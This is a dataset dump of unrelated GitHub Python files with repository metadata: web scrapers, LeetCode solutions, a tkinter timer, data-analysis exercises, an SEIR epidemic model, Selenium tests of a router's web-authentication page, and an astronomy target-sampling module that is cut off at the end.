sleep(2) # 스크롤 후 잠시 대기\n\n\n\n# 검색어 입력 및 검색 버튼 클릭\n\nsearch_input = driver.find_element(By.XPATH, \"//input[@id='headerSearchKeyword']\")\nsearch_input.send_keys(\"노트북\")\n\nsearch_input.send_keys(Keys.RETURN)\n\n\n# 검색 결과 페이지 로딩 대기\nsleep(10)\n\n\n# descriptions\n\n# 상품 리스트 가져오기\nproduct_list = driver.find_element(By.XPATH, \"//ul[@id='productList']\")\n\n# BeautifulSoup으로 파싱\nsoup = BeautifulSoup(product_list.get_attribute(\"outerHTML\"), \"html.parser\")\n\nspanvalue = []\nstrongvalue = []\n\n\ni=0\n# 광고 상품 제외하고 각 상품 정보 가져오기\nfor product in soup.find_all(\"li\", class_=\"search-product\"):\n # 광고 상품인 경우 스킵\n if product.find(class_=\"search-product__ad-badge\"):\n continue\n try:\n product_name = product.find(\"div\", class_=\"name\").text.strip()\n original_price = product.find(\"del\", class_=\"base-price\").text.strip()\n sale_price = product.find(\"strong\", class_=\"price-value\").text.strip()\n # rating = product.find(\"em\", class_=\"rating\").text.strip()\n review_count = product.find(\"span\", class_=\"rating-total-count\").text.strip()\n card_discount = (\n product.find(\"span\", class_=\"ccid-txt\").text.strip()\n if product.find(\"span\", class_=\"ccid-txt\")\n else \"N/A\"\n )\n reward_info = (\n product.find(\"span\", class_=\"reward-cash-txt\").text.strip()\n if product.find(\"span\", class_=\"reward-cash-txt\")\n else \"N/A\"\n )\n # delivery_info = product.find(\"span\", class_=\"arrival-info\").text.strip()\n\n\n div_elements = product.find_all('div', class_='used-product-info')\n spanchar=''\n strongchar=''\n # Now, let's find all span elements within the selected div elements\n for div in div_elements:\n span_elements = div.find_all('span')\n strong_elements = div.find_all('strong')\n \n for span in span_elements:\n print(span.text) # Print the text content of each span element soup.find_all(\"div\", class_=\"used-product-info\"):\n # spanvalue=span.text\n # print(spanchar)\n\n\n for strong in strong_elements:\n print(strong.text) # Print the text content of each span element soup.find_all(\"div\", class_=\"used-product-info\"):\n # strongvalue=strong.text\n # print(strongchar)\n\n \n \n # print(strong_elements.text)\n \n # span_elements = product.find_all(\"span\")\n # if product.find(\"span\"): \n # spanvalue = [span.text.strip() for span in span_elements]\n\n # else:\n # \"N/A\"\n \n # for span in span_elements:\n # span_text = span.text.strip()\n # # print('span:\\n',span_text)\n # spanvalue = str(span_text)\n # print('span:\\n',spanvalue)\n\n except Exception as e:\n continue\n # 콘솔에 출력\n\n print(\"-\" * 40)\n i =i+1\n print(f'{i}=>\\n')\n print(\"상품 이름:\", product_name)\n print(\"정가:\", original_price)\n print(\"판매 가격:\", sale_price)\n # print(\"별점:\", rating)\n print(\"리뷰 개수:\", review_count)\n print(\"카드 할인 정보:\", card_discount)\n print(\"적립 정보:\", reward_info)\n # print(\"배송 정보:\", delivery_info)\n\n # for spanarray in spanvalue:\n # print(spanarray)\n #\n # for strongarray in strongvalue:\n # print(strongarray)\n\n # print(spanvalue)\n # print(strongvalue)\n\n sleep(2)\n\nsleep(100)\n# driver.quit()\n","repo_name":"kim4989d/ezenpythonlevelbegin","sub_path":"webcrawing/coupang_login2.py","file_name":"coupang_login2.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33519461398","text":"class Solution:\n # @param {string} num\n # @return {boolean}\n # 回文数\n def isStrobogrammatic(self, num):\n dic = {'9': '6', '6': '9', '1': '1', '8': '8', '0': '0'}\n\n l, r = 0, len(num) - 1\n while l <= r:\n if num[l] not in dic or dic[num[l]] != num[r]:\n return False\n l += 1\n r -= 1\n return True\n\n# 1/5/2018 second time this problem\nclass Solution(object):\n def isStrobogrammatic(self, num):\n \"\"\"\n :type num: str\n :rtype: bool\n \"\"\"\n dict = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n snum = str(num)\n i = 0\n j = len(snum) - 1\n while i <= j:\n if (snum[i] not in dict) or (snum[j] not in dict) or (dict[snum[i]] != snum[j]):\n return False\n i += 1\n j -= 1\n return True\n","repo_name":"JoyiS/Leetcode","sub_path":"crackfun/246.Strobogrammatic Number.py","file_name":"246.Strobogrammatic Number.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26592958944","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# GraphicDetachedTimerManager: handle dynamic and graphical behaviour of a detached timer\n# \n# \n# \nimport tkinter as tk\nfrom TimerData import TimerData\nfrom Util import *\nimport logging\n\n\nclass GraphicDetachedTimer(tk.Toplevel):\n # constructor\n def __init__(self, mgr, name):\n super().__init__()\n self.mgr = mgr\n self.timerConf = mgr.UTtimerConfig\n self.timerData = self.timerConf.getTimerDataFromName(name)\n \n # initialization\n def init(self, ):\n # main logger\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info('')\n self.setTitle( self.timerData.timer_conf[ParamTimerCnf.Name])\n self.createLabelTimer()\n self.bindGTimers()\n # close the window with X\n self.protocol(\"WM_DELETE_WINDOW\", lambda : self.closing_procedure(self.destroy))\n \n # bind all \n def bindGTimers(self):\n self.logger.info('') \n # handle key binding \n self.bind('', lambda event: self.mgr.gTimersManager.processKeyPressed(event))\n \n # (re)create Labels\n def createLabelTimer(self):\n self.logger.info('')\n if self.timerData.label != None:\n self.timerData.label.destroy()\n self.timerData.label = None\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n self.logger.debug('Label %s creation text=%s' %(self.timerData.timer_conf[ParamTimerCnf.Name], self.timerData.getStrTimerValue()))\n self.timerData.label = tk.Label(self, text = self.timerData.getStrTimerValue() , \n font = fontTimerLabel,\n foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB], \n bg=self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] , padx=int(self.timerConf.general_conf[ParamCnf.TimerFontSize]) / 5)\n self.timerData.label.pack()\n \n #modify Font \n def changeFont(self): \n self.logger.info('')\n if self.timerData.isActive() == True:\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n self.timerData.label.config(font = fontTimerLabel)\n \n \n #modify color timer text \n def changeFgColorTimer(self):\n self.logger.info('')\n if self.timerConf.general_conf[ParamCnf.ColorTimerRGB] != '':\n self.timerData.label.config( foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB])\n\n #modify color timer text \n def changeBgColorTimer(self):\n self.logger.info('')\n if self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] != '':\n self.timerData.label.config(bg=self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB])\n \n # modify timer value\n def changeValue(self):\n self.timerData.label.config(text = self.timerData.getStrTimerValue())\n \n # clean\n def clean(self):\n self.logger.info('')\n if self.timerData.timer != None and self.timerData.timer.is_alive():\n self.timerData.timer.cancel()\n self.timerData.label = None\n \n # setTitle\n def setTitle(self, title):\n self.logger.info('title=%s' % title)\n self.title(title)\n \n # ask before closing application\n def closing_procedure(self, callback, *args, **kwargs):\n self.logger.info('args=%s kwargs=%s' % (args, kwargs))\n if self.mgr.optionsEditorMgr != None:\n tk.messagebox.showwarning('Warning', 'options editor opened, close first', parent=self)\n else:\n self.timerData.timer_conf[ParamTimerCnf.ActiveTimer] = False\n if tk.messagebox.askyesno(\"Hiding timer\", \"Do you want the timer to be hidden next time this configuration will be loaded? \", parent = self):\n self.mgr.UTtimerConfig.saveConfiguration()\n self.clean()\n self.mgr.gTimersManager.remove(self)\n callback(*args, **kwargs)\n","repo_name":"Danube31/UTTimer","sub_path":"source/GraphicDetachedTimer.py","file_name":"GraphicDetachedTimer.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70525788282","text":"import json\nimport time\n\n# Import competitions\nfrom eredivisie import EredivisieScraper\nfrom premierleague import PremierLeagueScraper\nfrom laliga import LaLigaScraper\nfrom ligueun import LigueUnScraper\nfrom bundesliga import BundesligaScraper\nfrom seriea import SerieAScraper\nfrom liganos import LigaNOSScraper\n\nverbose = True\ncompetitions = []\ntest = False\ntime_start = time.time()\n\nscrapers = {\n 'eredivisie': EredivisieScraper(verbose=verbose),\n 'premierleague': PremierLeagueScraper(verbose=verbose),\n 'laliga': LaLigaScraper(verbose=verbose),\n 'ligue1': LigueUnScraper(verbose=verbose),\n 'bundesliga': BundesligaScraper(verbose=verbose),\n 'seriea': SerieAScraper(verbose=verbose),\n 'liganos': LigaNOSScraper(verbose=verbose),\n}\n\nfor name, scraper in scrapers.items():\n try:\n competition = scraper.get_competition_json()\n competitions.append(competition)\n with open(name + '.json', 'w+') as fp:\n json.dump(competition, fp)\n\n except Exception as ex:\n print('Couldn\\'t scrape', name, ':', str(ex))\n\ntime_end = time.time()\nprint('Scraping complete in', time_end - time_start, 'seconds')\n\n# Print the result to output/competitions.json\nif not test:\n with open('competitions.json', 'w+') as fp:\n json.dump(competitions, fp)\n","repo_name":"dimas91/soccer-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37954270783","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Path of the file\r\npath\r\n#Code starts here\r\ndata = pd.read_csv(path)\r\n#print(type(data))\r\n#print(data.columns)\r\ndata.rename(columns={'Total':'Total_Medals'}, inplace=True)\r\ndata.head(10)\n\n\n# --------------\n#Code starts here\r\ndata.head()\r\ndata.columns\r\n\r\ndata['Better_Event'] = np.where(data['Total_Summer']> data['Total_Winter'],'Summer','Winter')\r\ndata['Better_Event'] = np.where(data['Total_Summer']==data['Total_Winter'],'Both',\r\ndata['Better_Event'])\r\nprint(data.head())\r\nevent_list = data['Better_Event'].value_counts().index.tolist()\r\nbetter_event = event_list[0]\r\nbetter_event\n\n\n# --------------\n#Code starts here\r\ntop_countries = data[['Country_Name','Total_Summer','Total_Winter','Total_Medals']]\r\n\r\ntop_countries.drop(top_countries.tail(1).index,inplace=True)\r\n\r\ndef top_ten(df,colname):\r\n country_list=[]\r\n top_10 = df.nlargest(10,colname)\r\n country_list = list(top_10['Country_Name'])\r\n return country_list\r\n\r\ntop_10_summer = top_ten(top_countries,'Total_Summer')\r\ntop_10_winter = top_ten(top_countries,'Total_Winter')\r\ntop_10 = top_ten(top_countries,'Total_Medals')\r\n\r\ncommon=[]\r\ncommon_pre=[]\r\ncommon_pre = [i for i in top_10_summer if i in top_10_winter]\r\ncommon = [j for j in common_pre if j in top_10]\r\nprint(common)\r\n\n\n\n# --------------\n#Code starts here\r\nimport matplotlib.pyplot as plt\r\n\r\nsummer_df = data[data['Country_Name'].isin(top_10_summer)]\r\nwinter_df = data[data['Country_Name'].isin(top_10_winter)]\r\ntop_df = data[data['Country_Name'].isin(top_10)]\r\n\r\nsummer_df.plot.bar(x='Country_Name',y='Total_Summer')\r\nwinter_df.plot.bar(x='Country_Name',y='Total_Winter')\r\ntop_df.plot.bar(x='Country_Name',y='Total_Medals')\r\n\n\n\n# --------------\n#Code starts here\r\nsummer_df['Golden_Ratio'] = summer_df['Gold_Summer']/summer_df['Total_Summer']\r\n\r\nsummer_max_ratio = max(summer_df['Golden_Ratio'])\r\nsummer_country_gold = list(summer_df[summer_df['Golden_Ratio']==summer_max_ratio]['Country_Name'])[0]\r\n\r\nwinter_df['Golden_Ratio'] = winter_df['Gold_Winter']/winter_df['Total_Winter']\r\nwinter_max_ratio = max(winter_df['Golden_Ratio'])\r\nwinter_country_gold = list(winter_df[winter_df['Golden_Ratio']==winter_max_ratio]['Country_Name'])[0]\r\n\r\ntop_df['Golden_Ratio'] = top_df['Gold_Total']/top_df['Total_Medals']\r\ntop_max_ratio = max(top_df['Golden_Ratio'])\r\ntop_country_gold = list(top_df[top_df['Golden_Ratio']==top_max_ratio]['Country_Name'])[0]\r\n\r\nprint(summer_country_gold,'s')\r\nprint(winter_country_gold,'w')\r\nprint(top_country_gold,'t')\n\n\n# --------------\n#Code starts here\r\nprint(data.tail(1))\r\ndata_1 = data.drop(data.iloc[-1:].index)\r\nprint(data_1.tail(1))\r\n\r\ndata_1['Total_Points'] = data_1['Gold_Total'].apply(lambda x:x*3) + data_1['Silver_Total'].apply(lambda x:x*2) + data_1['Bronze_Total'].apply(lambda x:x*1)\r\n\r\n#data_1.reset_index(inplace=True)\r\nmost_points = max(data_1['Total_Points'])\r\n\r\nbest_country = list(data_1[data_1['Total_Points']== most_points]['Country_Name'])[0]\r\nprint(most_points)\r\nprint(best_country)\r\n\r\n\r\n\n\n\n# --------------\n#Code starts here\r\nbest = data[data['Country_Name']== best_country][['Gold_Total','Silver_Total','Bronze_Total']]\r\n\r\nbest.plot.bar()\r\nplt.xlabel('United States')\r\nplt.ylabel('Medals Tally')\r\nplt.xticks(rotation=45)\r\nplt.show()\r\n\r\n\n\n\n","repo_name":"nish700/olympic-hero","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17256490736","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 23:48:30 2020\n\n@author: ASUS\n\"\"\"\nimport os\nimport sys\ntsvfile=\"/share/yiqian/smorf/code/name2.txt\"\nfile=[]\nwith open(tsvfile) as tsvf:\n for tsv in tsvf:\n tsv=tsv.strip()\n file.append(tsv)\n#file=[\"Odonovan_2020_athlete.smorfs.stats\",\"Nagy-Szakal_2017_CFS.smorfs.stats\",\"Lundgren_2018_infants.smorfs.stats\",\"Korpela_2018.smorfs.stats\",\"PRJEB32135_infant_canada.smorfs.stats\",\"Dhakan_2019.smorfs.stats\",\"Sankaranarayanan_2015_nativeAmericans.smorfs.stats\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",]\nfor name in file:\n infile=\"/share/yiqian/smorf/data/\"+name+\".tsv\"\n outfile=\"/share/yiqian/smorf/data/\"+name+\".fasta\"\n outfile=open(outfile,\"w\")\n with open (infile) as f:\n line=f.readline()\n for line in f:\n line=line.strip()\n linelist=line.split(\"\\t\")\n #print(\">\"+linelist[0]+\"\\n\"+linelist[1])\n outfile.write(\">\"+linelist[0]+\"\\n\"+linelist[1]+\"\\n\")\n outfile.close()\n","repo_name":"cocodyq/smORF","sub_path":"code/to_fasta.py","file_name":"to_fasta.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20704960449","text":"from typing import Dict, List\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom itertools import count\nfrom random import randint\nfrom os.path import join, exists\nfrom os import makedirs\n\nfrom data.countries import Countries\n\n\nclass BaseValue:\n def __init__(self, label, value) -> None:\n self.label = label\n self.value = value\n\n\nclass BaseModel:\n # Λ\n per_capita_birth_rate = 0\n # μ\n per_capita_natural_death_rate = 0\n # α\n virus_induced_average_fatality_rate = 0\n # β\n probability_of_disease_transmission = 0\n # ϵ\n rate_of_progression_from_exposed = 0\n # γ\n recovery_rate = 0\n # N0\n init_population = 0\n\n def __init__(self, title=\"Model\", xLabel=\"Days\", yLabel=\"Number of people\", labels=['S', 'E', 'I', 'R'],\n population=1000000, virus_induced_acerage_fatlity_rate=0.006, per_capita_natural_death_rate=0,\n per_capita_birth_rate=0,\n probability_of_disease_transmission=0.75, rate_of_progression_from_exposed=1 / 3,\n recovery_rate=1 / 8, country: Countries = None):\n \"\"\"\n Construct a model\n :param title: Model's title\n :param xLabel: Plot x axis's label\n :param yLabel: Plot y axis's label\n :param labels: List of labels you will have for your plot\n :param population: Init population\n :param virus_induced_acerage_fatlity_rate:\n :param per_capita_natural_death_rate:\n :param per_capita_birth_rate:\n :param probability_of_disease_transmission:\n :param rate_of_progression_from_exposed:\n :param recovery_rate:\n :param country: Which country\n \"\"\"\n self.title = title\n self.xLabel = xLabel\n self.yLabel = yLabel\n self.values_dict: Dict[str, List[BaseValue]] = {}\n self.labels: List[str] = labels\n self.days: List[int] = []\n self.index = count()\n\n self.init_population = population\n self.per_capita_birth_rate = per_capita_birth_rate\n self.per_capita_natural_death_rate = per_capita_natural_death_rate\n self.virus_induced_average_fatality_rate = virus_induced_acerage_fatlity_rate\n self.probability_of_disease_transmission = probability_of_disease_transmission\n self.rate_of_progression_from_exposed = rate_of_progression_from_exposed\n self.recovery_rate = recovery_rate\n self.country = country\n\n def compute(self, days=1):\n \"\"\"\n Compute the result for the future.\n :pa\n \"\"\"\n raise NotImplementedError\n\n def values(self) -> List[BaseValue]:\n \"\"\"\n Return a list of simulation values.\n :return:\n \"\"\"\n raise NotImplementedError\n\n def __plot__(self):\n \"\"\"\n Plot data\n :return:\n \"\"\"\n for label in self.labels:\n vs = self.values_dict[label]\n vs_list = [v.value for v in vs]\n plt.plot(self.days, vs_list, label=label)\n\n plt.xlabel(self.xLabel)\n plt.ylabel(self.yLabel)\n plt.title(self.title)\n plt.legend()\n\n def __simulate_one_day__(self):\n \"\"\"\n Make one day prediction\n :return:\n \"\"\"\n self.compute()\n self.days.append(next(self.index))\n\n def __add_one_day_values__(self):\n \"\"\"\n Input one day's value into the list\n :return:\n \"\"\"\n values = self.values()\n for value in values:\n ls = []\n if value.label in self.values_dict:\n ls = self.values_dict[value.label]\n ls.append(value)\n else:\n ls = [value]\n self.values_dict[value.label] = ls\n\n def __animate__(self, i):\n self.__simulate_one_day__()\n self.__add_one_day_values__()\n plt.cla()\n self.__plot__()\n\n def draw_graph_at(self, days=50, path=\"./results\") -> str:\n \"\"\"\n Draw data.\n :param path: save path\n :param days: Number day step\n :return:\n \"\"\"\n for i in range(days):\n self.__simulate_one_day__()\n self.__add_one_day_values__()\n self.__plot__()\n file_name = f\"{self.title}-{days}.png\"\n folder_name = join(path, 'graphs', str(self.country.value))\n file_name = join(folder_name, file_name)\n output_file_name = join('graphs', str(self.country.value), f\"{self.title}-{days}.png\")\n if not exists(folder_name):\n makedirs(folder_name)\n\n plt.savefig(file_name)\n plt.clf()\n return output_file_name\n\n def animate_graph(self, figure_number=1):\n \"\"\"\n Animate data\n :param figure_number:\n :return:\n \"\"\"\n fig = plt.figure(figure_number)\n ani = FuncAnimation(fig, self.__animate__, interval=1000)\n fig.tight_layout()\n plt.show()\n","repo_name":"sirily11/compartmental_model","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30705522333","text":"#! -*-conding:utf-8 -*-\n#@Time: 2019/1/14 0014 12:44\n#@swzhou\n'''\nweb认证 :弹出认证页面、认证后正常访问网络\n'''\n\n\n\nimport time\nimport unittest\nimport os.path\nimport socket\nimport subprocess\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom common.LogGen import LogGen\nfrom common.CapPic import CapPic\nfrom common.pingTest import pingTestIP\nfrom common.ReadConfig import getAssertText,getParameter,gettelnet\nfrom common.GetExcelValue import getExcelValue\nfrom common.loginRoute import login\nfrom common.organization_edit import organization_group\nfrom pages.Organization_003_userAuthpage import Organization_userAuthPage\nlogger = LogGen(Logger = 'Members_007_WebAuth').getlog()\nbatpath = os.path.dirname(os.path.abspath('.')) + '/script/'\nwebAutnp = getParameter('webAutnp')\nSupport = getExcelValue(webAutnp)\n\nclass webAuth(unittest.TestCase):\n\n def setUp(self):\n logger.info('setUp start')\n # pass\n\n def test_001_openWebAuth(self):\n u'''web认证开启'''\n host = gettelnet('host').split(r'.')\n host1 = host[0] + '.' + host[1] + '.' + host[2] +'.'\n # 006中设置了指定IP,这里增加一个判断联网\n pcaddr = socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n print(pcaddr)\n pingTestIP() # 避免判断失误\n\n p = pingTestIP()\n if p == 'N' or host1 not in pcaddr: # 如果不通 or 地址不为lan口网段\n # 1、改回DHCP, 调用bat脚本\n os.system('%s' % (batpath + 'changeDhcpIp.bat'))\n time.sleep(5)\n n = 0\n while n < 30:\n # 获取本机ip 默认有线地址,有线断开会显示无线\n pcaddr_new = socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n print(pcaddr_new, n)\n if '192.168.' not in str(pcaddr_new):\n time.sleep(2)\n n += 1\n else:\n print('IP地址已自动获取成功', n)\n break\n else:\n raise Exception('未获取到地址')\n\n if Support == '√':\n logger.info(u'参数支持本地认证')\n organization_group.import_empty_template(self) # 判断组织架构是否有其他组 有则清空\n\n # 打开用户管理 - 用户认证\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n #开启web认证\n webauth.click_WebAuthEn()\n time.sleep(1)\n # 断言 提示信息是否有误\n status = str(webauth.getAttribute_byXpath(webauth.WebAuthEs,'checked'))\n time.sleep(1)\n self.assertEqual(status,'true',msg='web认证开启出错')\n self.driver.quit()\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_001_openWebAuth passed')\n\n def test_002_webAuthTest(self):\n u'''web认证测试'''\n if Support == '√':\n logger.info(u'参数支持本地认证')\n webauthpage = getAssertText('webauthpage')\n webauthsucess = getAssertText('webauthsucess')\n # 新增用户组及认证账号\n # 调用新增组 “SelfComputerTest”\n organization_group.group_add(self)\n time.sleep(1)\n #\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n webauth.click_account()\n time.sleep(1)\n webauth.click_addUser()\n time.sleep(1)\n webauth.input_name('webtest1')\n # 仅有一个用户组,这里省略\n select = webauth.selelement_byName(webauth.authType)\n Select(select).select_by_value('Web')\n time.sleep(1)\n webauth.input_authAccount('webtest1')\n webauth.input_authPassword('webtest1')\n webauth.click_save()\n time.sleep(2)\n # 断言 添加的账号 认证方式和认证账号 是否正常\n list_authtype = webauth.getText_byXpath(webauth.list_authtype)\n list_authAcc = webauth.getText_byXpath(webauth.list_authAcc)\n self.assertEqual(str(list_authtype), 'Web', msg='认证方式显示不为“Web”')\n self.assertEqual(str(list_authAcc), 'webtest1', msg='认证账号不为“webtest1”')\n self.driver.quit()\n\n self.driver = webdriver.Chrome()\n # self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n #打开网页测试\n self.driver.get('http://www.utt.com.cn')\n time.sleep(2)\n title1=self.driver.title\n print(title1)\n self.assertEqual(title1, webauthpage, msg='认证页面跳转不正常')\n\n webauth = Organization_userAuthPage(self.driver, self.url)\n webauth.input_userName('webtest1')\n webauth.input_userPasswd('webtest1')\n webauth.click_loginbtn()\n time.sleep(2)\n title2 = self.driver.title\n print(title2)\n self.assertEqual(title2, webauthsucess, msg='不能认证成功')\n\n self.driver.get('http://www.baidu.com')\n time.sleep(2)\n title3 = self.driver.title\n print(title3)\n self.assertEqual(title3, '百度一下,你就知道', msg='认证后 不能打开网页')\n self.driver.quit()\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_002_webAuthTest passed')\n\n def test_003_closeWebAuth(self):\n u'''关闭web认证'''\n if Support == '√':\n logger.info(u'参数支持本地认证')\n # 打开用户管理 - 用户认证\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n # 开启web认证\n webauth.click_WebAuthC()\n time.sleep(1)\n # 断言 提示信息是否有误\n status = str(webauth.getAttribute_byXpath(webauth.WebAuthCs,'checked'))\n time.sleep(1)\n self.assertEqual(status, 'true', msg='web认证关闭出错')\n self.driver.quit()\n print('web认证关闭 验证成功')\n\n # 清空组织架构组\n organization_group.import_empty_template(self) # 判断组织架构是否有其他组 有则清空\n print('删除组织架构组 完成')\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_003_closeWebAuth passed')\n\n def tearDown(self):\n logger.info('tearDown over')\n logger.info('%s' % ('=' * 50))\n\nif __name__=='__main__':\n unittest.main()\n\n","repo_name":"sanwzhou/SEWEB","sub_path":"SEWEB/3.1.1Router/test_case/Members_007_WebAuth.py","file_name":"Members_007_WebAuth.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14562609129","text":"import os\nimport sys\n\n# -*- coding: utf-8 -*-\n\n'''\n处理上传到kindle的txt文件,防止encoding的问题\n'''\n\norg_file = r'E:\\temp\\js\\晋书\\晋书.txt'\n\n\ndef do_format(filename):\n if not os.path.exists(filename):\n print('File %s not existed.' % filename)\n sys.exit(1)\n\n # abs_filename = os.path.abspath(filename)\n # dir_name = os.path.split(abs_filename)[0]\n prefix = os.path.splitext(filename)[0]\n ext = os.path.splitext(filename)[1]\n print(filename)\n\n l_lines = ''\n try:\n with open(filename, 'r') as f:\n # with open(filename, 'r', encoding='utf-8', errors='ignore') as f:\n # with open(filename, 'r', errors='ignore') as f:\n # l_lines = f.readlines()\n l_lines = f.readlines()\n except Exception as e:\n print(e)\n\n print(l_lines)\n # for l in l_lines:\n # print(l)\n\n out_file = '%s%d%s' % (prefix, 0, ext)\n\n with open(out_file, 'w+') as f:\n for l in l_lines:\n try:\n f.write(l)\n except Exception as e:\n print(e)\n\n print('[Save]', out_file)\n\n\ndef main():\n do_format(org_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"socrates77-sh/play","sub_path":"kindle_txt.py","file_name":"kindle_txt.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37688122181","text":"\"\"\"\ndesitarget.mock.sample\n======================\n\nSamples magnitudes and shapes for LRG, ELG, QSO, and BGS targets from a Gaussian mixture model.\n\nThe model for each object type is fit to DR2 targets that have passed target\nselection critera.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nfrom desiutil.log import get_logger\nlog = get_logger()\n\nclass SampleGMM(object):\n \"\"\"Sample magnitudes based on target type (i.e. LRG, ELG, QSO, BGS).\n\n Can sample multiple targets at once and needs only to be called\n once for each target_type.\n\n Args:\n target_type (str) : One of four object types (LRG, ELG, QSO, BGS).\n n_targets (int) : Number of sampled magntiudes to be returned for the\n specified target_type.\n random_state: RandomState or an int seed. A random number generator.\n\n Returns: np.ndarray length n_targets :\n Structured array with columns g, r, z, w1, w2, w3, w4, exp_r, exp_e1,\n exp_e2, dev_r, dev_e1, dev_e2 of sampled magnitudes.\n\n \"\"\"\n def __init__(self, random_state=None):\n from pkg_resources import resource_filename\n from desiutil.sklearn import GaussianMixtureModel\n\n bgsfile = resource_filename('desitarget', 'mock/data/bgs_gmm.fits')\n elgfile = resource_filename('desitarget', 'mock/data/elg_gmm.fits')\n lrgfile = resource_filename('desitarget', 'mock/data/lrg_gmm.fits')\n qsofile = resource_filename('desitarget', 'mock/data/qso_gmm.fits')\n\n self.bgsmodel = GaussianMixtureModel.load(bgsfile)\n self.elgmodel = GaussianMixtureModel.load(elgfile)\n self.lrgmodel = GaussianMixtureModel.load(lrgfile)\n self.qsomodel = GaussianMixtureModel.load(qsofile)\n\n self.random_state = random_state\n\n def sample(self, target_type='LRG', n_targets=1):\n import numpy as np\n\n if target_type not in ('BGS', 'ELG', 'LRG', 'QSO'):\n log.fatal('Unknown object type {}!'.format(target_type))\n raise ValueError\n\n # Generate a sample of magnitudes/shapes of size n_targets.\n if target_type == 'BGS':\n params = self.bgsmodel.sample(n_targets, self.random_state).astype('f4')\n elif target_type == 'ELG':\n params = self.elgmodel.sample(n_targets, self.random_state).astype('f4')\n elif target_type == 'LRG':\n params = self.lrgmodel.sample(n_targets, self.random_state).astype('f4')\n elif target_type == 'QSO':\n params = self.qsomodel.sample(n_targets, self.random_state).astype('f4')\n\n tags = ('g', 'r', 'z', 'w1', 'w2', 'w3', 'w4')\n if target_type != 'QSO':\n tags = tags + ('exp_r', 'exp_e1', 'exp_e2', 'dev_r', 'dev_e1', 'dev_e2')\n\n samp = np.empty( n_targets, dtype=np.dtype( [(tt, 'f4') for tt in tags] ) )\n for ii, tt in enumerate(tags):\n samp[tt] = params[:, ii]\n \n return samp\n\ndef sample_mag_shape(target_type, n_targets, random_state=None):\n \"\"\"Sample magnitudes and shapes based on target type (i.e. LRG, ELG, QSO, BGS).\n\n Can sample multiple targets at once and needs only to be called\n once for each target_type.\n\n Parameters\n ----------\n target_type : str\n One of four object types (LRG, ELG, QSO, BGS).\n n_targets : int\n Number of sampled magntiudes and shapes to be returned for the specified\n target_type.\n random_state: RandomState or an int seed\n A random number generator.\n\n\n Returns\n -------\n np.ndarray length n_targets\n Structured array with columns g,r,z,w1,w2,w3,w4,exp_r,exp_e1, exp_e2,\n dev_r, dev_e1, dev_e2 of sampled magnitudes and shapes. Note that\n target_type='QSO' only returns magnitudes.\n \"\"\"\n import 